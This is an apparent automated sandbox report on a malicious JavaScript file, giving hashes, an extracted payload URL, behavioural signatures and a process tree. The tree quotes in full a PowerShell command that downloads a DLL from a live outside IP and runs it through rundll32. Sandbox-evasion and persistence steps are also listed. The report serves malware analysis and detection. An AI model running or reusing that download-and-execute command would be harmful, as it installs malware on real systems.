Analysis
- max time kernel: 152s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-05-2024 06:05
Static task
- static1
Behavioral task
- behavioral1
- Sample: 9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js
- Resource: win7-20240419-en
General
- Target: 9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js
- Size: 134KB
- MD5: 1f2912c0c12b316023061de20ee3cc55
- SHA1: 05cad925852e41a0832bc9bf3db5056990d027d4
- SHA256: 9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330
- SHA512: 226d9de84f0a3624e8b84ec3f89026299d457907faab3246694b04de40af76d927561ccbf463444e5049dd55ac2a72f4e727c6e10f4a490604c01738142c7f5b
- SSDEEP: 1536:BIscHpcWN6ns7eemQA1iPFmpcEo0SlWu37kxlvtqMPeHp6o:5cHDesSemV1iQWEo0SlWA7Alvtl8f
Malware Config
Extracted
http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9
Signatures
- Blocklisted process makes network request (13 IoCs)
  Processes: rundll32.exe
  flow | pid | process
  47 | 4248 | rundll32.exe
  49 | 4248 | rundll32.exe
  50 | 4248 | rundll32.exe
  51 | 4248 | rundll32.exe
  52 | 4248 | rundll32.exe
  53 | 4248 | rundll32.exe
  55 | 4248 | rundll32.exe
  56 | 4248 | rundll32.exe
  57 | 4248 | rundll32.exe
  58 | 4248 | rundll32.exe
  59 | 4248 | rundll32.exe
  64 | 4248 | rundll32.exe
  65 | 4248 | rundll32.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: wscript.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | wscript.exe
- Loads dropped DLL (1 IoC)
  Processes: rundll32.exe
  pid | process
  4248 | rundll32.exe
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Drops file in System32 directory (1 IoC)
  Processes: rundll32.exe
  description | ioc | process
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ZIBYF9XW.htm | rundll32.exe
- Drops file in Windows directory (1 IoC)
  Processes: rundll32.exe
  description | ioc | process
  File created | C:\Windows\Tasks\RtlCpl.job | rundll32.exe
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Checks processor information in registry (2 TTPs, 5 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: rundll32.exe
  description | ioc | process
  Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | rundll32.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
  Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | rundll32.exe
- Modifies data under HKEY_USERS (3 IoCs)
  Processes: rundll32.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe, powershell.exe
  pid | process
  1680 | powershell.exe
  1680 | powershell.exe
  1680 | powershell.exe
  3524 | powershell.exe
  3524 | powershell.exe
  3524 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: powershell.exe, powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 1680 | powershell.exe
  Token: SeDebugPrivilege | 3524 | powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: wscript.exe, powershell.exe, powershell.exe
  description | pid | process | target process
  PID 3400 wrote to memory of 1680 | 3400 | wscript.exe | powershell.exe
  PID 3400 wrote to memory of 1680 | 3400 | wscript.exe | powershell.exe
  PID 1680 wrote to memory of 3524 | 1680 | powershell.exe | powershell.exe
  PID 1680 wrote to memory of 3524 | 1680 | powershell.exe | powershell.exe
  PID 3524 wrote to memory of 2364 | 3524 | powershell.exe | rundll32.exe
  PID 3524 wrote to memory of 2364 | 3524 | powershell.exe | rundll32.exe
Processes
(indentation reflects the process tree depth reported by the sandbox)
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe "C:\Users\Admin\AppData\Local\Temp\9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\rundll32.exe
        Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\hlxfhdqd.ob4,Start
        - Drops file in Windows directory
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3976 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8
- C:\Windows\system32\rundll32.exe
  Command line: C:\Windows\system32\rundll32.exe "C:\ProgramData\RtlCpl\RtlCpl.dll",Start /p
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\ProgramData\RtlCpl\RtlCpl.dll
  Filesize: 59KB
  MD5: 59fcd8a54f43d911fc7a8945e07b0246
  SHA1: 759fcbf9f7a7d2ec42f938e0c69acfc07c682a97
  SHA256: 1bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d
  SHA512: 6d67da2334a4e2e4f4c615d8661a5df2be3fc5467f5636760c15322c3abe5cfe1df339b29dfa008362f6e34b8afad44aef6858eb8aa1cae9c2b0dc7cc2ba7332
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieymjob3.dqx.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- memory/1680-14-0x00000209A89C0000-0x00000209A8B36000-memory.dmp
  Filesize: 1.5MB
- memory/1680-3-0x000002098FCD0000-0x000002098FCF2000-memory.dmp
  Filesize: 136KB
- memory/1680-2-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp
  Filesize: 10.8MB
- memory/1680-13-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp
  Filesize: 10.8MB
- memory/1680-0-0x00007FFE89A53000-0x00007FFE89A55000-memory.dmp
  Filesize: 8KB
- memory/1680-15-0x00000209A8D50000-0x00000209A8F5A000-memory.dmp
  Filesize: 2.0MB
- memory/1680-30-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp
  Filesize: 10.8MB
- memory/1680-1-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmp
  Filesize: 10.8MB
- memory/2364-31-0x00007FFE8F660000-0x00007FFE8F677000-memory.dmp
  Filesize: 92KB
- memory/3524-25-0x0000023E74910000-0x0000023E74936000-memory.dmp
  Filesize: 152KB
- memory/3524-26-0x0000023E74970000-0x0000023E74984000-memory.dmp
  Filesize: 80KB
- memory/4248-38-0x00007FFEA3700000-0x00007FFEA3717000-memory.dmp
  Filesize: 92KB